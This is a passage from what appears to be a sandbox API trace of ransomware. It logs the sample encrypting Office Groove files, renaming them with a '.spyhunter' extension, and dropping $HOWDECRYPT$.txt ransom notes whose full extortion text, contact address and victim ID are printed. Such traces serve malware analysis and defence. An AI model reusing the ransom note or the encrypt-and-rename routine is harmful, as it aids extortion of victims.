GetProcessHeap () returned 0x2c0000 [0106.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0106.623] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0106.623] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb34*, lpNumberOfBytesWritten=0x25cfaf4*=0x4, lpOverlapped=0x0) returned 1 [0106.624] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfaf4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfaf4*=0x30, lpOverlapped=0x0) returned 1 [0106.624] CloseHandle (hObject=0x16c) returned 1 [0106.624] GetProcessHeap () returned 0x2c0000 [0106.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0106.625] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV.spyhunter") returned 86 [0106.626] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Places\\TOOT.WAV.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\places\\toot.wav.spyhunter")) returned 1 [0106.627] GetProcessHeap () returned 0x2c0000 [0106.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0106.627] GetProcessHeap () returned 0x2c0000 [0106.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0106.627] GetProcessHeap () returned 0x2c0000 [0106.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9efa8 | out: hHeap=0x2c0000) returned 1 [0106.627] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0106.627] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0106.627] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfa67*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfb90, lpOverlapped=0x0 | out: lpBuffer=0x25cfa67*, lpNumberOfBytesWritten=0x25cfb90*=0x127, lpOverlapped=0x0) returned 1 [0106.628] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0106.628] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfb90, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfb90*=0x2ac, lpOverlapped=0x0) returned 1 [0106.628] CloseHandle (hObject=0x16c) returned 1 [0106.629] GetProcessHeap () returned 0x2c0000 [0106.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9f7d0 | out: hHeap=0x2c0000) returned 1 [0106.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0106.630] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0106.630] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfa63*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfa63*, lpNumberOfBytesWritten=0x25cfb8c*=0x127, lpOverlapped=0x0) returned 1 [0106.631] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0106.631] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cfb8c*=0x2ac, lpOverlapped=0x0) returned 1 [0106.631] CloseHandle (hObject=0x16c) returned 1 [0106.631] GetProcessHeap () returned 0x2c0000 [0106.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c263f0 | out: hHeap=0x2c0000) returned 1 [0106.631] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb28 | out: pbBuffer=0x25cfb28) returned 1 [0106.631] GetProcessHeap () returned 0x2c0000 [0106.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0106.631] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb20*=0x30) returned 1 [0106.631] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.108] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV") returned 78 [0107.108] StrStrW (lpFirst="WHOOSH.WAV", lpSrch=".txt") returned 0x0 [0107.108] GetProcessHeap () returned 0x2c0000 [0107.108] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.108] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfae4*=0x2800, lpOverlapped=0x0) returned 1 [0107.133] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.133] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfae4*=0x2800, lpOverlapped=0x0) returned 1 [0107.133] GetProcessHeap () returned 0x2c0000 [0107.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.134] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.134] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb24*, lpNumberOfBytesWritten=0x25cfae4*=0x4, lpOverlapped=0x0) returned 1 [0107.150] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfae4*=0x30, lpOverlapped=0x0) returned 1 [0107.150] CloseHandle (hObject=0x154) returned 1 [0107.150] GetProcessHeap () returned 0x2c0000 [0107.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.150] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV.spyhunter") returned 88 [0107.150] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\Sounds\\Things\\WHOOSH.WAV.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\sounds\\things\\whoosh.wav.spyhunter")) returned 1 [0107.151] GetProcessHeap () returned 0x2c0000 [0107.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.151] GetProcessHeap () returned 0x2c0000 [0107.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0107.151] GetProcessHeap () returned 0x2c0000 [0107.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c9f6e8 | out: hHeap=0x2c0000) returned 1 [0107.151] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb28 | out: pbBuffer=0x25cfb28) returned 1 [0107.151] GetProcessHeap () returned 0x2c0000 [0107.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0107.152] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb20*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb20*=0x30) returned 1 [0107.152] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0107.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg") returned 113 [0107.184] StrStrW (lpFirst="DiscussionToolIconImages.jpg", lpSrch=".txt") returned 0x0 [0107.184] GetProcessHeap () returned 0x2c0000 [0107.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0107.185] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfae4*=0x2800, lpOverlapped=0x0) returned 1 [0107.199] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.200] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfae4*=0x2800, lpOverlapped=0x0) returned 1 [0107.200] GetProcessHeap () returned 0x2c0000 [0107.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0107.200] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.200] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfb24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x25cfb24*, lpNumberOfBytesWritten=0x25cfae4*=0x4, lpOverlapped=0x0) returned 1 [0107.204] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfae4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfae4*=0x30, lpOverlapped=0x0) returned 1 [0107.204] CloseHandle (hObject=0xb4) returned 1 [0107.204] GetProcessHeap () returned 0x2c0000 [0107.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0107.204] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg.spyhunter") returned 123 [0107.205] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimages.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimages.jpg.spyhunter")) returned 1 [0107.205] GetProcessHeap () returned 0x2c0000 [0107.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0107.205] GetProcessHeap () returned 0x2c0000 [0107.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0107.205] GetProcessHeap () returned 0x2c0000 [0107.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf0720 | out: hHeap=0x2c0000) returned 1 [0107.206] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb20 | out: pbBuffer=0x25cfb20) returned 1 [0107.206] GetProcessHeap () returned 0x2c0000 [0107.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0107.206] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb18*=0x30) returned 1 [0107.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0107.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg") returned 115 [0107.219] StrStrW (lpFirst="InactiveTabImage.jpg", lpSrch=".txt") returned 0x0 [0107.219] GetProcessHeap () returned 0x2c0000 [0107.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0107.219] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfadc*=0x24ed, lpOverlapped=0x0) returned 1 [0107.238] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffdb13, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.238] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x24ed, lpNumberOfBytesWritten=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfadc*=0x24ed, lpOverlapped=0x0) returned 1 [0107.238] GetProcessHeap () returned 0x2c0000 [0107.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0107.238] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.239] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x25cfb1c*, lpNumberOfBytesWritten=0x25cfadc*=0x4, lpOverlapped=0x0) returned 1 [0107.239] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfadc*=0x30, lpOverlapped=0x0) returned 1 [0107.239] CloseHandle (hObject=0x16c) returned 1 [0107.239] GetProcessHeap () returned 0x2c0000 [0107.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.239] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg.spyhunter") returned 125 [0107.239] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimage.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveDocumentReview\\InactiveTabImage.jpg.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\groovedocumentreview\\inactivetabimage.jpg.spyhunter")) returned 1 [0107.240] GetProcessHeap () returned 0x2c0000 [0107.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.240] GetProcessHeap () returned 0x2c0000 [0107.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0107.240] GetProcessHeap () returned 0x2c0000 [0107.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf0990 | out: hHeap=0x2c0000) returned 1 [0107.240] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb20 | out: pbBuffer=0x25cfb20) returned 1 [0107.240] GetProcessHeap () returned 0x2c0000 [0107.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0107.240] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb18*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb18*=0x30) returned 1 [0107.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_disable.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.699] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif") returned 110 [0107.699] StrStrW (lpFirst="button_right_disable.gif", lpSrch=".txt") returned 0x0 [0107.699] GetProcessHeap () returned 0x2c0000 [0107.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.709] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfadc*=0xe1, lpOverlapped=0x0) returned 1 [0107.727] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffff1f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.727] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe1, lpNumberOfBytesWritten=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfadc*=0xe1, lpOverlapped=0x0) returned 1 [0107.728] GetProcessHeap () returned 0x2c0000 [0107.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0107.728] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.728] WriteFile (in: hFile=0x154, lpBuffer=0x25cfb1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x25cfb1c*, lpNumberOfBytesWritten=0x25cfadc*=0x4, lpOverlapped=0x0) returned 1 [0107.728] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfadc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfadc*=0x30, lpOverlapped=0x0) returned 1 [0107.728] CloseHandle (hObject=0x154) returned 1 [0107.742] GetProcessHeap () returned 0x2c0000 [0107.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2de0090 [0107.742] wnsprintfW (in: pszDest=0x2de0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif.spyhunter") returned 120 [0107.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_disable.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_disable.gif.spyhunter")) returned 1 [0107.743] GetProcessHeap () returned 0x2c0000 [0107.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de0090 | out: hHeap=0x2c0000) returned 1 [0107.743] GetProcessHeap () returned 0x2c0000 [0107.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0107.743] GetProcessHeap () returned 0x2c0000 [0107.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf2de0 | out: hHeap=0x2c0000) returned 1 [0107.744] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb18 | out: pbBuffer=0x25cfb18) returned 1 [0107.744] GetProcessHeap () returned 0x2c0000 [0107.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0107.744] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfb10*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfb10*=0x30) returned 1 [0107.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formspreviewtemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0107.763] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsPreviewTemplate.html") returned 111 [0107.763] StrStrW (lpFirst="FormsPreviewTemplate.html", lpSrch=".txt") returned 0x0 [0107.763] GetProcessHeap () returned 0x2c0000 [0107.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0107.763] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfad4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfad4*=0x3a2, lpOverlapped=0x0) returned 1 [0107.828] SetFilePointerEx (in: 